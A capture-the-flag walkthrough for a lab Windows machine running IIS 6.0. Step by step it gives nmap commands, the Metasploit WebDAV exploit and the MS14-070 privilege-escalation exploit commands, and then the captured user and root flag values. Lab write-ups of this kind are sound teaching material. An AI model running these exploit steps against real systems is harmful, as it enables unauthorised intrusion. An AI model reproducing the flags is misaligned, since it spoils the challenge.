As usual let's start with nmap:
nmap -sV -sC 10.129.170.231
We can see that the web server is on Microsoft-IIS/6.0.
I googled "IIS6 exploit" and found this article from rapid7:
Let's follow the steps in the article.
First, open a new command prompt and type the following to load metasploit:
msfconsole
As per the article let's type:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
show options
We need to set LHOST and RHOSTS as they are required fields.
LHOST (local host) should be set with the IP of your machine. If you don't know the IP of your machine, you can find out using ifconfig. My machine's IP is 10.10.14.21, yours will be different.
set LHOST 10.10.14.21
RHOST (remote host) is the target machine's IP:
set RHOSTS
exploit
It worked!
shell
whoami
We are nt authority\network service
Great!
The shell is not great though. We need to escalate our privileges now.
Lets exit to return to the meterpreter shell
exit
Privilege Escalation
Let's use Lester, or Exploit Suggester. Lester is a module that scan the target for vulnerabilities. It is not actively exploiting them though, just scanning for them. However, you need to have a session opened on the target already to be able to use Lester. But we have a session already so let's try this.
run post/multi/recon/local_exploit_suggester
We get several exploits - let's pick exploit/windows/local/ms14_070_tcpip_ioctl
But first, let's see what processes are running on the target machine:
ps
We need to find a process that is running under NT AUTHORITY\NETWORK SERVICE
The process ID for davcdata.exe is PID 2292
Let's migrate to this process using:
migrate 2292
background
This tells us it is session 1
use exploit/windows/local/ms14_070_tcpip_ioctl
set SESSION 1
show options
set LHOST 10.10.14.21
exploit
It worked!!
shell
cd C:\Documents and Settings\Lakis\Desktop
dir
type user.txt
700c5dc163014e22b3e408f8703f67d1
Congratulations! You found the user flag!
cd C:\Documents and Settings\Administrator\Desktop
dir
type root.txt
aa4beed1c0584445ab463a6747bd06e9
Congratulations! You found the root flag!
Comments